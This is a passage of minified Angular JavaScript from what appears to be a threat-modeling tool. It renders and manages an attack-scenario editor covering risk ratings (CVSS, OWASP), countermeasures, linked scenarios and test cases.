e=B(3);C(1),V("canEdit",!1)("threatQuestion",e.attackScenario.ThreatQuestion)}}function O7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,P7e,3,2,"ng-template",94),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.Question"),"\n        "),C(4),ct("\n          ",e.attackScenario.ThreatQuestion.Name,"\n          ")}}function N7e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-threat-rule",98),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("threatRule",e.attackScenario.ThreatRule)}}function L7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,N7e,3,2,"ng-template",94),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.Rule"),"\n        "),C(4),ct("\n          ",e.attackScenario.ThreatRule.Name,"\n          ")}}function z7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;B(),V("matMenuTriggerFor",Ti(381))("matMenuTriggerData",fr(3,A5,e.scenarios)),C(1),ke(e.name)}}function W7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkScenario(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function F7e(t,a){if(1&t&&(s(0,"\n              "),ne(1,W7e,2,2,"button",40),s(2,"\n            ")),2&t){const e=a.item;C(1),V("ngForOf",e)}}function V7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(2).OnLinkScenario(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function B7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedLinkedScenario=r)}),s(1,"\n          "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",89),s(6),u(),s(7,"\n          "),m(8,"button",90),he("click",function(){const r=be(e).$implicit;return Me(B(2).EditAttackScenario(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"edit"),u()(),s(12,"\n          "),m(13,"button",91),he("click",function(){const r=be(e).$implicit;return Me(B(2).OnUnlinkScenario(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"remove"),u()(),s(17,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedLinkedScenario===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedLinkedScenario===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),at("matTooltip",re(9,8,"general.Edit")),C(5),at("matTooltip",re(14,10,"general.Remove"))}}function H7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n        "),it(2,"app-attack-scenario",99),s(3,"\n      "),u()),2&t){const e=B(2);C(2),V("canEdit",!1)("attackScenario",e.selectedLinkedScenario)}}function U7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function q7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function G7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedTestCase=r)}),s(1,"\n          "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",89),s(6),u(),s(7,"\n          "),m(8,"button",91),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnUnlinkTestCase(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"remove"),u()(),s(12,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedTestCase===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedTestCase===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),at("matTooltip",re(9,7,"general.Remove"))}}function j7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n        "),it(2,"app-test-case",103),s(3,"\n      "),u()),2&t){const e=B(3);C(2),V("testCase",e.selectedTestCase)}}function Q7e(t,a){if(1&t){const e=Ye();m(0,"div",48),s(1,"\n    "),m(2,"div",49),s(3,"\n      "),m(4,"mat-list",50),s(5,"\n        "),m(6,"div",51),s(7),oe(8,"translate"),m(9,"button",52),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n          "),m(14,"mat-menu",null,100),s(16,"\n            "),m(17,"input",34,101),he("ngModelChange",function(n){return be(e),Me(B(2).searchTCString=n)})("click",function(){return be(e),Me(B(2).OnSearchTCBoxClick())}),oe(19,"translate"),u(),s(20,"\n            "),ne(21,U7e,2,2,"button",40),s(22,"\n          "),u(),s(23,"\n          "),m(24,"mat-menu",null,102),s(26,"\n            "),ne(27,q7e,2,2,"button",40),s(28,"\n          "),u(),s(29,"\n        "),u(),s(30,"\n        "),ne(31,G7e,13,9,"mat-list-item",59),s(32,"\n      "),u(),s(33,"\n    "),u(),s(34,"\n    "),m(35,"div",60),s(36,"\n      "),ne(37,j7e,4,1,"div",61),s(38,"\n    "),u(),s(39,"\n  "),u()}if(2&t){const e=Ti(15),i=Ti(25),n=B(2);C(4),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),C(3),ct("",re(8,14,"properties.LinkedTestCases")," \n          "),C(2),at("matTooltip",re(10,16,"general.Add")),V("matMenuTriggerFor",e),C(8),at("placeholder",re(19,18,"general.Search")),V("ngModel",n.searchTCString)("matMenuTriggerFor",i),C(4),V("ngForOf",n.GetTestCases()),C(6),V("ngForOf",n.GetFilteredTestCases()),C(4),V("ngForOf",n.attackScenario.GetTestCases()),C(6),V("ngIf",n.selectedTestCase)}}function $7e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",1),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(B().attackScenario.Name=n)}),u(),s(10,"\n    "),ne(11,q5e,6,3,"button",4),s(12,"\n  "),u(),s(13,"\n  "),m(14,"mat-form-field",5),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(B().attackScenario.Number=n)}),u(),s(21,"\n    "),ne(22,G5e,3,3,"mat-hint",7),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",8),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(B().attackScenario.ThreatState=n)}),oe(34,"translate"),s(35,"\n      "),ne(36,j5e,3,4,"mat-option",10),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),ne(40,Q5e,3,3,"mat-icon",11),s(41,"\n  "),it(42,"br"),s(43,"\n  "),m(44,"mat-form-field",12),s(45,"\n    "),m(46,"mat-label"),s(47),oe(48,"translate"),u(),s(49,"\n    "),it(50,"input",13),s(51,"\n  "),u(),s(52,"\n  "),m(53,"mat-form-field",14),s(54,"\n    "),m(55,"mat-label"),s(56),oe(57,"translate"),u(),s(58,"\n    "),it(59,"input",15),s(60,"\n  "),u(),s(61,"\n  "),m(62,"mat-form-field",16),s(63,"\n    "),m(64,"mat-label"),s(65),oe(66,"translate"),u(),s(67,"\n    "),it(68,"input",13),s(69,"\n  "),u(),s(70,"\n  "),it(71,"br"),s(72,"\n  "),m(73,"mat-form-field",8),s(74,"\n    "),m(75,"mat-label"),s(76),oe(77,"translate"),oe(78,"translate"),u(),s(79,"\n    "),m(80,"mat-select",17),he("valueChange",function(n){return be(e),Me(B().attackScenario.AttackVector=n)}),s(81,"\n      "),m(82,"input",18),he("keyup",function(n){return be(e),Me(B().OnSearchAttackVectors(n))}),oe(83,"translate"),u(),s(84,"\n      "),m(85,"mat-option"),s(86),oe(87,"translate"),u(),s(88,"\n      "),ne(89,K5e,4,2,"mat-optgroup",19),s(90,"\n    "),u(),s(91,"\n    "),m(92,"button",20),he("click",function(n){return be(e),B().AddAttackVector(),Me(n.stopPropagation())}),oe(93,"translate"),s(94,"\n      "),m(95,"mat-icon"),s(96,"add"),u(),s(97,"\n    "),u(),s(98,"\n  "),u(),s(99,"\n  "),m(100,"mat-form-field",21),s(101,"\n    "),m(102,"mat-label"),s(103),oe(104,"translate"),u(),s(105,"\n    "),m(106,"mat-select",22),he("valueChange",function(n){return be(e),Me(B().attackScenario.ThreatCategories=n)})("selectionChange",function(){return be(e),Me(B().sysThreatGroups=null)}),s(107,"\n      "),m(108,"input",18),he("keyup",function(n){return be(e),Me(B().OnSearchThreatCategories(n))}),oe(109,"translate"),u(),s(110,"\n      "),ne(111,Y5e,4,2,"mat-optgroup",19),s(112,"\n    "),u(),s(113,"\n  "),u(),s(114,"\n  "),m(115,"mat-form-field",23),s(116,"\n    "),m(117,"mat-label"),s(118),oe(119,"translate"),u(),s(120,"\n    "),m(121,"mat-select",24),he("valueChange",function(n){return be(e),Me(B().attackScenario.SystemThreats=n)}),s(122,"\n      "),m(123,"input",18),he("keyup",function(n){return be(e),Me(B().OnSearchSystemThreat(n))}),oe(124,"translate"),u(),s(125,"\n      "),ne(126,Z5e,5,4,"mat-optgroup",19),s(127,"\n    "),u(),s(128,"\n  "),u(),s(129,"\n  "),ne(130,i7e,17,9,"mat-form-field",25),s(131,"\n  "),m(132,"mat-form-field",26),s(133,"\n    "),m(134,"mat-label"),s(135),oe(136,"translate"),u(),s(137,"\n    "),m(138,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B().attackScenario.Description=n)}),u(),s(139,"\n  "),u(),s(140,"\n  "),it(141,"app-tags",28),s(142),oe(143,"translate"),m(144,"button",29),oe(145,"translate"),s(146,"\n    "),m(147,"mat-icon"),s(148,"more_vert"),u(),s(149,"\n  "),u(),s(150,"\n  "),m(151,"mat-menu",null,30),s(153,"\n    "),m(154,"button",31),he("click",function(){return be(e),Me(B().AddMethodCVSS())}),s(155),oe(156,"translate"),u(),s(157,"\n    "),m(158,"button",31),he("click",function(){return be(e),Me(B().AddMethodOwaspRR())}),s(159),oe(160,"translate"),u(),s(161,"\n    "),m(162,"button",32),s(163),oe(164,"translate"),u(),s(165,"\n  "),u(),s(166,"\n  "),m(167,"mat-menu",null,33),s(169,"\n    "),m(170,"input",34,35),he("ngModelChange",function(n){return be(e),Me(B().searchASString=n)})("click",function(){return be(e),Me(B().OnSearchASBoxClick())}),oe(172,"translate"),u(),s(173,"\n    "),ne(174,a7e,2,5,"button",36),s(175,"\n  "),u(),s(176,"\n  "),m(177,"mat-menu",null,37),s(179,"\n    "),ne(180,o7e,3,1,"ng-template",38),s(181," \n  "),u(),s(182,"\n  "),m(183,"mat-menu",null,39),s(185,"\n    "),ne(186,r7e,2,2,"button",40),s(187,"\n  "),u(),s(188,"\n  "),ne(189,s7e,20,4,"mat-form-field",41),s(190,"\n  "),ne(191,l7e,27,8,"mat-form-field",41),s(192,"\n  "),m(193,"mat-form-field",42),s(194,"\n    "),m(195,"mat-label"),s(196),oe(197,"translate"),u(),s(198,"\n    "),m(199,"mat-select",43),he("valueChange",function(n){return be(e),Me(B().attackScenario.Severity=n)})("selectionChange",function(){return be(e),Me(B().attackScenario.CalculateRisk())}),s(200,"\n      "),m(201,"mat-option"),s(202),oe(203,"translate"),u(),s(204,"\n      "),ne(205,d7e,3,4,"mat-option",10),s(206,"\n    "),u(),s(207,"\n    "),ne(208,m7e,5,0,"button",44),s(209,"\n    "),ne(210,u7e,5,0,"button",44),s(211,"\n  "),u(),s(212,"\n  "),m(213,"mat-form-field",45),s(214,"\n    "),m(215,"mat-label"),s(216),oe(217,"translate"),u(),s(218,"\n    "),m(219,"mat-select",43),he("valueChange",function(n){return be(e),Me(B().attackScenario.Likelihood=n)})("selectionChange",function(){return be(e),Me(B().attackScenario.CalculateRisk())}),s(220,"\n      "),m(221,"mat-option"),s(222),oe(223,"translate"),u(),s(224,"\n      "),ne(225,h7e,3,4,"mat-option",10),s(226,"\n    "),u(),s(227,"\n    "),ne(228,f7e,5,0,"button",44),s(229,"\n    "),ne(230,p7e,5,0,"button",44),s(231,"\n  "),u(),s(232,"\n  "),m(233,"mat-form-field",45),s(234,"\n    "),m(235,"mat-label"),s(236),oe(237,"translate"),u(),s(238,"\n    "),m(239,"mat-select",46),he("valueChange",function(n){return be(e),Me(B().attackScenario.Risk=n)}),s(240,"\n      "),m(241,"mat-option"),s(242),oe(243,"translate"),u(),s(244,"\n      "),ne(245,_7e,3,4,"mat-option",10),s(246,"\n    "),u(),s(247,"\n    "),ne(248,g7e,5,0,"button",44),s(249,"\n    "),ne(250,C7e,5,0,"button",44),s(251,"\n  "),u(),s(252,"\n  "),m(253,"mat-form-field",45),s(254,"\n    "),m(255,"mat-label"),s(256),oe(257,"translate"),u(),s(258,"\n    "),m(259,"mat-select",46),he("valueChange",function(n){return be(e),Me(B().attackScenario.RiskStrategy=n)}),s(260,"\n      "),m(261,"mat-option"),s(262),oe(263,"translate"),u(),s(264,"\n      "),ne(265,y7e,3,4,"mat-option",10),s(266,"\n    "),u(),s(267,"\n  "),u(),s(268,"\n  "),ne(269,b7e,8,5,"mat-form-field",47),s(270,"\n  "),ne(271,M7e,8,5,"mat-form-field",47),s(272,"\n  "),ne(273,v7e,8,5,"mat-form-field",47),s(274,"\n  "),m(275,"mat-form-field",26),s(276,"\n    "),m(277,"mat-label"),s(278),oe(279,"translate"),u(),s(280,"\n    "),m(281,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B().attackScenario.RiskStrategyReason=n)}),u(),s(282,"\n  "),u(),s(283,"\n  "),m(284,"div",48),s(285,"\n    "),m(286,"div",49),s(287,"\n      "),m(288,"mat-list",50),s(289,"\n        "),m(290,"div",51),s(291),oe(292,"translate"),m(293,"button",52),oe(294,"translate"),m(295,"mat-icon"),s(296,"add"),u()(),s(297,"\n          "),m(298,"mat-menu",null,53),s(300,"\n            "),m(301,"button",54),he("click",function(){return be(e),Me(B().AddCountermeasure())}),s(302),oe(303,"translate"),u(),s(304,"\n            "),m(305,"button",32),s(306),oe(307,"translate"),u(),s(308,"\n          "),u(),s(309,"\n          "),m(310,"mat-menu",null,55),s(312,"\n            "),m(313,"input",34,56),he("ngModelChange",function(n){return be(e),Me(B().searchCMString=n)})("click",function(){return be(e),Me(B().OnSearchCMBoxClick())}),oe(315,"translate"),u(),s(316,"\n            "),ne(317,A7e,2,5,"button",36),s(318,"\n          "),u(),s(319,"\n          "),m(320,"mat-menu",null,57),s(322,"\n            "),ne(323,E7e,3,1,"ng-template",38),s(324," \n          "),u(),s(325,"\n          "),m(326,"mat-menu",null,58),s(328,"\n            "),ne(329,D7e,2,2,"button",40),s(330,"\n          "),u(),s(331,"\n        "),u(),s(332,"\n        "),ne(333,x7e,19,14,"mat-list-item",59),s(334,"\n      "),u(),s(335,"\n    "),u(),s(336,"\n    "),m(337,"div",60),s(338,"\n      "),ne(339,w7e,4,1,"div",61),s(340,"\n    "),u(),s(341,"\n  "),u(),s(342,"\n  "),m(343,"mat-accordion",62),s(344,"\n    "),ne(345,R7e,17,4,"mat-expansion-panel",63),s(346,"\n    "),ne(347,k7e,17,4,"mat-expansion-panel",63),s(348,"\n    "),ne(349,O7e,17,4,"mat-expansion-panel",63),s(350,"\n    "),ne(351,L7e,17,4,"mat-expansion-panel",63),s(352,"\n  "),u(),s(353,"\n  "),it(354,"br"),s(355,"\n  "),m(356,"div",48),s(357,"\n    "),m(358,"div",49),s(359,"\n      "),m(360,"mat-list",50),s(361,"\n        "),m(362,"div",51),s(363),oe(364,"translate"),m(365,"button",52),oe(366,"translate"),m(367,"mat-icon"),s(368,"add"),u()(),s(369,"\n          "),m(370,"mat-menu",null,64),s(372,"\n            "),m(373,"input",34,65),he("ngModelChange",function(n){return be(e),Me(B().searchLinkedASString=n)})("click",function(){return be(e),Me(B().OnSearchLinkedASBoxClick())}),oe(375,"translate"),u(),s(376,"\n            "),ne(377,z7e,2,5,"button",36),s(378,"\n          "),u(),s(379,"\n          "),m(380,"mat-menu",null,66),s(382,"\n            "),ne(383,F7e,3,1,"ng-template",38),s(384," \n          "),u(),s(385,"\n          "),m(386,"mat-menu",null,67),s(388,"\n            "),ne(389,V7e,2,2,"button",40),s(390,"\n          "),u(),s(391,"\n        "),u(),s(392,"\n        "),ne(393,B7e,18,12,"mat-list-item",59),s(394,"\n      "),u(),s(395,"\n    "),u(),s(396,"\n    "),m(397,"div",60),s(398,"\n      "),ne(399,H7e,4,2,"div",61),s(400,"\n    "),u(),s(401,"\n  "),u(),s(402,"\n  "),ne(403,Q7e,40,20,"div",68),s(404,"\n"),u()}if(2&t){const e=Ti(152),i=Ti(168),n=Ti(184),r=Ti(299),c=Ti(311),d=Ti(327),T=Ti(371),k=Ti(387),q=B();let Y,te;Ct("disable",!q.canEdit),C(5),ke(re(6,131,"properties.Name")),C(3),at("matTooltip",q.attackScenario.Name),V("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.Name),C(3),V("ngIf",q.attackScenario.Name),C(6),ke(re(18,133,"general.Number")),C(3),at("matTooltip",q.attackScenario.Number),V("ngModel",q.attackScenario.Number),C(2),V("ngIf",q.attackScenario.CheckUniqueNumber()),C(8),ke(re(31,135,"properties.Status")),C(3),at("matTooltip",re(34,137,q.GetThreatStateName(q.attackScenario.ThreatState))),V("value",q.attackScenario.ThreatState),C(3),V("ngForOf",q.GetThreatStates()),C(4),V("ngIf",!q.attackScenario.RuleStillApplies),C(7),ke(re(48,139,"general.Target")),C(3),at("matTooltip",null==q.attackScenario.Target?null:q.attackScenario.Target.GetProperty("Name")),V("spellcheck",q.dataService.HasSpellCheck)("value",null==q.attackScenario.Target?null:q.attackScenario.Target.Name),C(6),ke(re(57,141,"general.Targets")),C(3),V("spellcheck",q.dataService.HasSpellCheck)("value",q.GetTargetsNames()),C(6),ke(re(66,143,"general.Diagram")),C(3),at("matTooltip",null==(Y=q.attackScenario.GetDiagram())?null:Y.Name),V("spellcheck",q.dataService.HasSpellCheck)("value",null==(te=q.attackScenario.GetDiagram())?null:te.Name),C(8),za("",re(77,145,"general.AttackVector")," (",re(78,147,"general.Informative"),")"),C(4),at("matTooltip",null==q.attackScenario.AttackVector?null:q.attackScenario.AttackVector.Name),V("value",q.attackScenario.AttackVector),C(2),at("placeholder",re(83,149,"general.Search")),C(4),ke(re(87,151,"properties.selectNone")),C(3),V("ngForOf",q.GetAttackVectorGroups()),C(3),at("matTooltip",re(93,153,"general.Add")),C(11),ct("",re(104,155,"general.ThreatCategories"),"*"),C(3),V("value",q.attackScenario.ThreatCategories),C(2),at("placeholder",re(109,157,"general.Search")),C(3),V("ngForOf",q.GetThreatCategoryGroups()),C(4),XS("width: calc(100% - ",q.GetSystemThreatsWidth(),");"),C(3),ke(re(119,159,"general.SystemThreats")),C(3),V("value",q.attackScenario.SystemThreats),C(2),at("placeholder",re(124,161,"general.Search")),C(3),V("ngForOf",q.GetSystemThreatGroups()),C(4),V("ngIf",q.dataService.Project.Settings.ThreatActorToAttackScenario),C(5),ke(re(136,163,"properties.Description")),C(3),V("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.Description),C(3),V("tagableElement",q.attackScenario),C(1),ct("\n  ",re(143,165,"general.RiskAssessment")," \n  "),C(2),at("matTooltip",re(145,167,"general.More")),V("matMenuTriggerFor",e),C(10),V("disabled",null!=q.attackScenario.ScoreCVSS),C(1),ke(re(156,169,"pages.modeling.attackscenario.addCVSS")),C(3),V("disabled",null!=q.attackScenario.ScoreOwaspRR),C(1),ke(re(160,171,"pages.modeling.attackscenario.addOwaspRR")),C(3),V("matMenuTriggerFor",i),C(1),ke(re(164,173,"pages.modeling.attackscenario.takeRiskValuesFrom")),C(7),at("placeholder",re(172,175,"general.Search")),V("ngModel",q.searchASString)("matMenuTriggerFor",n),C(4),V("ngForOf",q.GetAttackScenarioGroups()),C(12),V("ngForOf",q.GetFilteredAttackScenarios()),C(3),V("ngIf",q.attackScenario.ScoreCVSS),C(2),V("ngIf",q.attackScenario.ScoreOwaspRR),C(5),ke(re(197,177,"properties.Severity")),C(3),V("value",q.attackScenario.Severity),C(3),ke(re(203,179,"properties.selectNone")),C(3),V("ngForOf",q.GetSeverityTypes()),C(3),V("ngIf",null==q.attackScenario.SeverityReason),C(2),V("ngIf",null!=q.attackScenario.SeverityReason),C(6),ke(re(217,181,"general.Likelihood")),C(3),V("value",q.attackScenario.Likelihood),C(3),ke(re(223,183,"properties.selectNone")),C(3),V("ngForOf",q.GetLMHValues()),C(3),V("ngIf",null==q.attackScenario.LikelihoodReason),C(2),V("ngIf",null!=q.attackScenario.LikelihoodReason),C(6),ke(re(237,185,"properties.Risk")),C(3),V("value",q.attackScenario.Risk),C(3),ke(re(243,187,"properties.selectNone")),C(3),V("ngForOf",q.GetSeverityTypes()),C(3),V("ngIf",null==q.attackScenario.RiskReason),C(2),V("ngIf",null!=q.attackScenario.RiskReason),C(6),ke(re(257,189,"properties.RiskStrategy")),C(3),V("value",q.attackScenario.RiskStrategy),C(3),ke(re(263,191,"properties.selectNone")),C(3),V("ngForOf",q.GetRiskStrategies()),C(4),V("ngIf",null!=q.attackScenario.SeverityReason),C(2),V("ngIf",null!=q.attackScenario.LikelihoodReason),C(2),V("ngIf",null!=q.attackScenario.RiskReason),C(5),ke(re(279,193,"properties.RiskStrategyReason")),C(3),V("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.RiskStrategyReason),C(7),Ct("prop-list-light",!q.theme.IsDarkMode)("prop-list-dark",q.theme.IsDarkMode),C(3),ct("",re(292,195,"general.Countermeasures")," \n          "),C(2),at("matTooltip",re(294,197,"general.Add")),V("matMenuTriggerFor",r),C(9),ke(re(303,199,"general.New")),C(3),V("matMenuTriggerFor",c),C(1),ke(re(307,201,"general.Existing")),C(7),at("placeholder",re(315,203,"general.Search")),V("ngModel",q.searchCMString)("matMenuTriggerFor",d),C(4),V("ngForOf",q.GetCountermeasureGroups()),C(12),V("ngForOf",q.GetFilteredCountermeasures()),C(4),V("ngForOf",q.countermeasures),C(6),V("ngIf",q.selectedCountermeasure),C(6),V("ngIf",q.attackScenario.CveEntry),C(2),V("ngIf",q.attackScenario.AttackVector),C(2),V("ngIf",q.attackScenario.ThreatQuestion),C(2),V("ngIf",q.attackScenario.ThreatRule),C(9),Ct("prop-list-light",!q.theme.IsDarkMode)("prop-list-dark",q.theme.IsDarkMode),C(3),ct("",re(364,205,"properties.LinkedScenarios")," \n          "),C(2),at("matTooltip",re(366,207,"general.Add")),V("matMenuTriggerFor",T),C(8),at("placeholder",re(375,209,"general.Search")),V("ngModel",q.searchLinkedASString)("matMenuTriggerFor",k),C(4),V("ngForOf",q.GetAttackScenarioGroups()),C(12),V("ngForOf",q.GetFilteredLinkedAttackScenarios()),C(4),V("ngForOf",q.attackScenario.LinkedScenarios),C(6),V("ngIf",q.selectedLinkedScenario),C(4),V("ngIf",q.dataService.Project.HasTesting)}}let lM=(()=>{class t{constructor(e,i,n,r,c){this.theme=n,this.dataService=r,this.dialog=c,this.searchCounter=0,this.canEdit=!0,this.searchASString="",this.searchLinkedASString="",this.searchCMString="",this.searchTCString="",this.attackScenario=e,i&&i.subscribe(d=>this.attackScenario=d)}get attackScenario(){return this._attackScenario}set attackScenario(e){this._attackScenario=e,e&&(this.countermeasures=e.GetCountermeasures()),this.selectedCountermeasure=this.selectedLinkedScenario=this.selectedTestCase=null,this.sysThreatGroups=this.threatSources=this.threatCategoryGroups=this.attackVectorGroups=this.attackScenarioGroups=this.countermeasureGroups=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}GetAttackVectorGroups(){return null==this.attackVectorGroups&&(this.attackVectorGroups=[],this.dataService.Config.GetAttackVectorGroups().forEach(e=>{e.AttackVectors.length>0&&this.attackVectorGroups.push({name:e.Name,AttackVectors:e.AttackVectors})})),this.attackVectorGroups}OnSearchAttackVectors(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.attackVectorGroups=null,this.GetAttackVectorGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.AttackVector;this.attackVectorGroups.forEach(r=>{r.AttackVectors=r.AttackVectors.filter(c=>c==n||c.Name.toLowerCase().includes(i))}),this.attackVectorGroups=this.attackVectorGroups.filter(r=>r.AttackVectors.length>0)}},250)}GetThreatCategoryGroups(){return null==this.threatCategoryGroups&&(this.threatCategoryGroups=[],this.dataService.Config.GetThreatCategoryGroups().forEach(e=>{e.ThreatCategories.length>0&&this.threatCategoryGroups.push({name:e.Name,ThreatCategories:e.ThreatCategories})})),this.threatCategoryGroups}OnSearchThreatCategories(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.threatCategoryGroups=null,this.GetThreatCategoryGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.ThreatCategories;this.threatCategoryGroups.forEach(r=>{r.ThreatCategories=r.ThreatCategories.filter(c=>n.includes(c)||c.Name.toLowerCase().includes(i))}),this.threatCategoryGroups=this.threatCategoryGroups.filter(r=>r.ThreatCategories.length>0)}},250)}GetSystemThreatGroups(){if(null==this.sysThreatGroups){this.sysThreatGroups=[];const e={name:"general.Highlighted",SystemThreats:this.dataService.Project.GetSystemThreats().filter(n=>this.attackScenario.ThreatCategories.includes(n.ThreatCategory))},i={name:"general.SystemThreats",SystemThreats:this.dataService.Project.GetSystemThreats().filter(n=>!e.SystemThreats.includes(n))};e.SystemThreats.length>0&&this.sysThreatGroups.push(e),this.sysThreatGroups.push(i)}return this.sysThreatGroups}OnSearchSystemThreat(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.sysThreatGroups=null,this.GetSystemThreatGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.SystemThreats;this.sysThreatGroups.forEach(r=>{r.SystemThreats=r.SystemThreats.filter(c=>n.includes(c)||c.Name.toLowerCase().includes(i))}),this.sysThreatGroups=this.sysThreatGroups.filter(r=>r.SystemThreats.length>0)}},250)}GetTargetsNames(){if(this.attackScenario.Targets)return this.attackScenario.Targets.map(e=>e.Name).join(", ")}AddAttackVector(){let e=this.dataService.Config.CreateAttackVector(null);this.dialog.OpenAddAttackVectorDialog(e).subscribe(i=>{i?this.attackScenario.AttackVector=e:this.dataService.Config.DeleteAttackVector(e)})}AddMethodCVSS(){this.attackScenario.ScoreCVSS={},this.EditMethodCVSS()}EditMethodCVSS(){this.dialog.OpenCVSSEntryDiaglog(this.attackScenario.ScoreCVSS).subscribe(()=>this.OnScoreCVSSChanged())}RemoveMethodCVSS(){this.attackScenario.ScoreCVSS=null}AddMethodOwaspRR(){this.attackScenario.ScoreOwaspRR={},this.EditMethodOwaspRR()}EditMethodOwaspRR(){this.dialog.OpenOwaspRREntryDiaglog(this.attackScenario.ScoreOwaspRR).subscribe(()=>this.OnScoreOwaspRRChanged())}RemoveMethodOwaspRR(){this.attackScenario.ScoreOwaspRR=null}OnScoreCVSSChanged(){this.attackScenario.Severity=Wm.ToThreatSeverity(this.attackScenario.ScoreCVSS.Score),this.attackScenario.CalculateRisk()}OnScoreOwaspRRChanged(){this.attackScenario.Severity=this.attackScenario.ScoreOwaspRR.Impact,this.attackScenario.Likelihood=this.attackScenario.ScoreOwaspRR.Likelihood,this.attackScenario.CalculateRisk()}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetThreatSources(){return null==this.threatSources&&(this.threatSources=this.dataService.Project.GetThreatSources().Sources),this.threatSources}ThreatSourcesAll(){return this.attackScenario.ThreatSources.length==this.dataService.Project.GetThreatSources().Sources.length}ThreatSourcesSome(){return this.attackScenario.ThreatSources.length>0&&!this.ThreatSourcesAll()}ThreatSourcesLabel(){return this.ThreatSourcesAll()?"pages.modeling.attackscenario.threatSourcesNone":"pages.modeling.attackscenario.threatSourcesAll"}ThreatSourcesUpdate(e){this.attackScenario.ThreatSources=e?this.dataService.Project.GetThreatSources().Sources:[]}OnSearchThreatSources(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.threatSources=null,this.GetThreatSources();const i=e.target.value.toLowerCase(),n=this.attackScenario.ThreatSources;this.threatSources=this.threatSources.filter(r=>n.includes(r)||r.Name.toLowerCase().includes(i))}},250)}GetFilteredAttackScenarios(){return 